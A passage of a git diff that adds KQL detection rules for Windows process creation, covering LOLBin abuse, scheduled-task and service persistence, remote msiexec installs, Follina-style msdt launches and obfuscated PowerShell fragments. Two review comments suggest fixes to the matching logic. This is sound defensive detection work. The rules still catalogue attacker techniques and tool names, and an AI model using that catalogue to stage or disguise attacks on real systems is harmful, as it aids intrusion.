"\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) and (not(((ProcessCommandLine endswith "-Embedding" and FolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and FolderPath endswith "\\FileCoAuth.exe") or (ProcessCommandLine endswith "-Embedding" and FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe")))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_modification_of_scheduled_tasks.kql b/KQL/rules/windows/process_creation/suspicious_modification_of_scheduled_tasks.kql new file mode 100644 index 00000000..0d258bb5 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_modification_of_scheduled_tasks.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Modification Of Scheduled Tasks +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-28 +// Level: high +// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location +// Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on +// Instead they modify the task after creation to include their malicious payload +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " /Change " and ProcessCommandLine contains " /TN ") and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "bash.exe" or ProcessCommandLine contains "bash " or ProcessCommandLine contains "scrcons" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "forfiles" or ProcessCommandLine contains "scriptrunner" or ProcessCommandLine contains "hh.exe" or ProcessCommandLine contains "hh ") and (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains 
"\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Perflogs\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_msbuild_execution_by_uncommon_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_msbuild_execution_by_uncommon_parent_process.kql new file mode 100644 index 00000000..1b4c62a9 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_msbuild_execution_by_uncommon_parent_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Msbuild Execution By Uncommon Parent Process +// Author: frack113 +// Date: 2022-11-17 +// Level: medium +// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (FolderPath endswith "\\MSBuild.exe" or ProcessVersionInfoOriginalFileName =~ "MSBuild.exe") and (not((InitiatingProcessFolderPath endswith "\\devenv.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\python.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\nuget.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_msdt_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_msdt_parent_process.kql new file mode 100644 index 00000000..342a5044 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_msdt_parent_process.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious MSDT Parent Process +// Author: Nextron Systems +// Date: 2022-06-01 +// Level: high +// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1218 + +DeviceProcessEvents +| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_mshta_child_process.kql b/KQL/rules/windows/process_creation/suspicious_mshta_child_process.kql new file mode 100644 index 00000000..7c4b4a5b --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_mshta_child_process.kql 
@@ -0,0 +1,13 @@ +// Title: Suspicious MSHTA Child Process +// Author: Michael Haag +// Date: 2019-01-16 +// Level: high +// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003 +// False Positives: +// - Printer software / driver installations +// - HP software + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\bitsadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe", "cscript.exe", "Bash.exe", "reg.exe", "REGSVR32.EXE", "bitsadmin.exe"))) and InitiatingProcessFolderPath endswith "\\mshta.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_mshta_exe_execution_patterns.kql b/KQL/rules/windows/process_creation/suspicious_mshta_exe_execution_patterns.kql new file mode 100644 index 00000000..a3092b25 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_mshta_exe_execution_patterns.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious Mshta.EXE Execution Patterns +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-07-17 +// Level: high +// Description: Detects suspicious mshta process execution patterns +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1106 + +DeviceProcessEvents +| where ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and ((ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))) or ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and (not(((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\") or (ProcessCommandLine contains ".htm" or ProcessCommandLine contains ".hta") or (ProcessCommandLine endswith "mshta.exe" or ProcessCommandLine endswith "mshta"))))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_msiexec_embedding_parent.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_embedding_parent.kql new file mode 100644 index 00000000..0a793859 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_msiexec_embedding_parent.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious MsiExec Embedding Parent +// Author: frack113 +// Date: 2022-04-16 +// Level: medium +// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218.007, attack.defense-evasion + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") and (InitiatingProcessCommandLine contains "MsiExec.exe" and InitiatingProcessCommandLine contains "-Embedding ")) and (not(((ProcessCommandLine contains "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" and FolderPath endswith ":\\Windows\\System32\\cmd.exe") or (ProcessCommandLine contains "\\DismFoDInstall.cmd" or (InitiatingProcessCommandLine contains "\\MsiExec.exe -Embedding " and InitiatingProcessCommandLine contains "Global\\MSI0000"))))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_msiexec_execute_arbitrary_dll.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_execute_arbitrary_dll.kql new file mode 100644 index 00000000..0d13b60e --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_msiexec_execute_arbitrary_dll.kql 
@@ -0,0 +1,13 @@ +// Title: Suspicious Msiexec Execute Arbitrary DLL +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. +// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 +// False Positives: +// - Legitimate script + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -y" or ProcessCommandLine contains " /y" or ProcessCommandLine contains " –y" or ProcessCommandLine contains " —y" or ProcessCommandLine contains " ―y") and FolderPath endswith "\\msiexec.exe") and (not((ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" /Y C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y C:\\Windows\\CCM\\"))) \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/suspicious_msiexec_quiet_install_from_remote_location.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_quiet_install_from_remote_location.kql
new file mode 100644
index 00000000..4e2b3576
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_msiexec_quiet_install_from_remote_location.kql
@@ -0,0 +1,10 @@ +// Title: Suspicious Msiexec Quiet Install From Remote Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-28 +// Level: medium +// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "\\AppData\\Local\\Temp\\OpenOffice" and ProcessCommandLine contains "Installation Files\\openoffice"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/windows/process_creation/suspicious_mstsc_exe_execution_with_local_rdp_file.kql new file mode 100644 index 00000000..da71f0ab --- /dev/null 
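Review bot: The switch terms in the `| where` line (`contains "-i"`, `contains "/i"`, `contains "/a"`, `contains "-q"`, …) carry no leading separator, so they match inside the remote operand as well as as switches: any `http` URL or UNC path containing `/i`, `/a`, `/q` or `-j` as a substring satisfies the switch groups regardless of the actual msiexec arguments, which inflates false positives on a rule that has no False Positives section. Anchoring each switch to a token boundary, e.g. `ProcessCommandLine matches regex @"(^|\s)[-/–—―](i|package|a|j)(\s|$)"` for the install-option group and the same shape for the quiet-option group (allowing a suffix such as `n`/`b` there), keeps the windash variants but only counts real switches. The OpenOffice exclusion at the end is fine as written.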
+++ b/KQL/rules/windows/process_creation/suspicious_mstsc_exe_execution_with_local_rdp_file.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Mstsc.EXE Execution With Local RDP File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-18 +// Level: high +// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Likelihood is related to how often the paths are used in the environment + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated " or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Downloads\\") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_network_command.kql b/KQL/rules/windows/process_creation/suspicious_network_command.kql new file mode 100644 index 00000000..2b43c97d --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_network_command.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Network Command +// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2021-12-07 +// Level: low +// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Administrator, hotline ask to user + +DeviceProcessEvents +| where ProcessCommandLine matches regex "ipconfig\\s+/all" or ProcessCommandLine matches regex "netsh\\s+interface show interface" or ProcessCommandLine matches regex "arp\\s+-a" or ProcessCommandLine matches regex "nbtstat\\s+-n" or ProcessCommandLine matches regex "net\\s+config" or ProcessCommandLine matches regex "route\\s+print" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_new_service_creation.kql b/KQL/rules/windows/process_creation/suspicious_new_service_creation.kql new file mode 100644 index 00000000..308b2067 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_new_service_creation.kql 
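Review bot: Every term in the `| where` line uses `matches regex`, which in KQL is case-sensitive, unlike the `contains`/`endswith` operators the neighbouring rules rely on; `IPCONFIG /ALL`, `Arp -a` or `NET CONFIG` as typed by an operator or emitted by a script would not match. If case-insensitive matching is intended (the Sigma `re` modifier is also case-sensitive, so this may be faithful to upstream), prefix each pattern with `(?i)`, e.g. `ProcessCommandLine matches regex "(?i)ipconfig\\s+/all"`, or have the converter emit `(?i)` for regex terms generally. The `\\s` escaping is correct here because RE2 re-interprets the single backslash the string literal yields.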
@@ -0,0 +1,12 @@ +// Title: Suspicious New Service Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-14 +// Level: high +// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql b/KQL/rules/windows/process_creation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql new file mode 100644 index 00000000..890f936d --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious NTLM Authentication on the Printer Spooler Service +// Author: Elastic (idea), Tobias Michalski (Nextron Systems) +// Date: 2022-05-04 +// Level: high +// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.credential-access, attack.t1212 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_obfuscated_powershell_code.kql b/KQL/rules/windows/process_creation/suspicious_obfuscated_powershell_code.kql new file mode 100644 index 00000000..7783b72a --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_obfuscated_powershell_code.kql 
@@ -0,0 +1,10 @@
+// Title: Suspicious Obfuscated PowerShell Code
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-11
+// Level: high
+// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "IAAtAGIAeABvAHIAIAAwAHgA" or ProcessCommandLine contains "AALQBiAHgAbwByACAAMAB4A" or ProcessCommandLine contains "gAC0AYgB4AG8AcgAgADAAeA" or ProcessCommandLine contains "AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg" or ProcessCommandLine contains "AuAEkAbgB2AG8AawBlACgAKQAgAHwAI" or ProcessCommandLine contains "ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AJwAgAC0AZgAg"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_outlook_child_process.kql b/KQL/rules/windows/process_creation/suspicious_outlook_child_process.kql
new file mode 100644
index 00000000..8a7a7cf6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_outlook_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Outlook Child Process
+// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
+// Date: 2022-02-28
+// Level: high
+// Description: Detects a suspicious process spawning from an Outlook process.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_parent_double_extension_file_execution.kql b/KQL/rules/windows/process_creation/suspicious_parent_double_extension_file_execution.kql
new file mode 100644
index 00000000..382f4dff
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_parent_double_extension_file_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Parent Double Extension File Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-06
+// Level: high
+// Description: Detect execution of suspicious double extension files in ParentCommandLine
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.007
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith ".doc.lnk" or InitiatingProcessFolderPath endswith ".docx.lnk" or InitiatingProcessFolderPath endswith ".xls.lnk" or InitiatingProcessFolderPath endswith ".xlsx.lnk" or InitiatingProcessFolderPath endswith ".ppt.lnk" or InitiatingProcessFolderPath endswith ".pptx.lnk" or InitiatingProcessFolderPath endswith ".rtf.lnk" or InitiatingProcessFolderPath endswith ".pdf.lnk" or InitiatingProcessFolderPath endswith ".txt.lnk" or InitiatingProcessFolderPath endswith ".doc.js" or InitiatingProcessFolderPath endswith ".docx.js" or InitiatingProcessFolderPath endswith ".xls.js" or InitiatingProcessFolderPath endswith ".xlsx.js" or InitiatingProcessFolderPath endswith ".ppt.js" or InitiatingProcessFolderPath endswith ".pptx.js" or InitiatingProcessFolderPath endswith ".rtf.js" or InitiatingProcessFolderPath endswith ".pdf.js" or InitiatingProcessFolderPath endswith ".txt.js") or (InitiatingProcessCommandLine contains ".doc.lnk" or InitiatingProcessCommandLine contains ".docx.lnk" or InitiatingProcessCommandLine contains ".xls.lnk" or InitiatingProcessCommandLine contains ".xlsx.lnk" or InitiatingProcessCommandLine contains ".ppt.lnk" or InitiatingProcessCommandLine contains ".pptx.lnk" or InitiatingProcessCommandLine contains ".rtf.lnk" or InitiatingProcessCommandLine contains ".pdf.lnk" or InitiatingProcessCommandLine contains ".txt.lnk" or InitiatingProcessCommandLine contains ".doc.js" or InitiatingProcessCommandLine contains ".docx.js" or InitiatingProcessCommandLine contains ".xls.js" or InitiatingProcessCommandLine contains ".xlsx.js" or InitiatingProcessCommandLine contains ".ppt.js" or InitiatingProcessCommandLine contains ".pptx.js" or InitiatingProcessCommandLine contains ".rtf.js" or InitiatingProcessCommandLine contains ".pdf.js" or InitiatingProcessCommandLine contains ".txt.js")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/windows/process_creation/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
new file mode 100644
index 00000000..b732b260
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-14
+// Level: high
+// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_ping_del_command_combination.kql b/KQL/rules/windows/process_creation/suspicious_ping_del_command_combination.kql
new file mode 100644
index 00000000..9498dc5e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_ping_del_command_combination.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Ping/Del Command Combination
+// Author: Ilya Krestinichev
+// Date: 2022-11-03
+// Level: high
+// Description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example
+// MITRE Tactic: Defense Evasion
